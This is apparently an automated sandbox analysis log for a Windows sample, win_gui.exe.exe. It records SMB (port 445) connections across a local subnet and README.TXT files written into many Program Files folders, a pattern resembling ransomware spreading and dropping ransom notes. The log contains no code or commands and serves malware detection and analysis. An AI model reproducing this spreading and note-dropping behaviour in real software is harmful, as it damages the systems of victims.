Source: global trafficTCP traffic: 192.168.2.214:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.215:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.212:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.213:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.218:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.219:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.216:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.217:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.210:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.211:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.39:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.38:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.42:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.41:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.44:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.43:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.46:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.45:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.48:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.47:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.40:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.28:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.27:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.29:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.31:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.30:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.33:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.32:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.35:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.34:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.37:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.36:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.17:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.16:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.19:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.18:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.20:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.22:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.21:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.24:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.23:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.26:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.25:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.11:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.10:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.13:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.12:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.15:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.14:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.0:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.2:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.1:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.180:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.181:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.8:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.7:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.9:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.4:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.3:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.6:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.5:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.86:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.85:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.88:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.87:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.89:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.184:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.185:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.80:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.182:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.183:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.82:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.188:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.81:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.189:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.84:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.186:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.83:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.187:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.191:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.192:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.190:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.75:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.74:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.77:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.76:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.79:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.78:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.195:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.196:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.193:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.194:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.71:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.199:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.70:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.73:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.197:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.72:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.198:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.64:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.63:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.66:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.168:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.65:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.169:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.68:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.67:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.69:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.162:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.163:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.160:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.161:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.60:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.166:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.167:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.62:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.164:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.61:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.165:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.170:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.49:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.53:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.52:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.55:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.179:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.54:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.57:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.56:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.59:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.58:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.173:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.174:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.171:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.172:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.177:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.178:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.51:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.175:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.50:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.176:445Jump to behavior
Source: win_gui.exe.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Microsoft Office 15\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Uninstall Information\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\7-Zip\Lang\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\7-Zip\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Esl\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\CMap\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\SaslPrep\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Air\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Assets\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Javascripts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Locale\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\Pfm\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\locales\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\swiftshader\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\locales\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\swiftshader\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ar_AE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\cs_CZ\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\da_DK\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\de_DE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\el_GR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_AE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_GB\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_IL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_US\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\es_ES\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fi_FI\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_FR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_MA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\he_IL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\hu_HU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\it_IT\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ja_JP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ko_KR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nb_NO\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nl_NL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pl_PL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pt_BR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ru_RU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sk_SK\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sl_SI\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sv_SE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\tr_TR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\uk_UA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_CN\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_TW\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Locale\en_US\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\prc\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\CAN\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\DEU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\FRA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\JPN\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\UK\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\ICU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\Mappings\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\PMP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\MPP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\fonts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\Mappings\Adobe\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\Mappings\Mac\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\Mappings\win\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\__VERSION__\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\prod\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\stage\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\__VERSION__\private\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\app\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\core\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\files\README.TXTJump to behavior
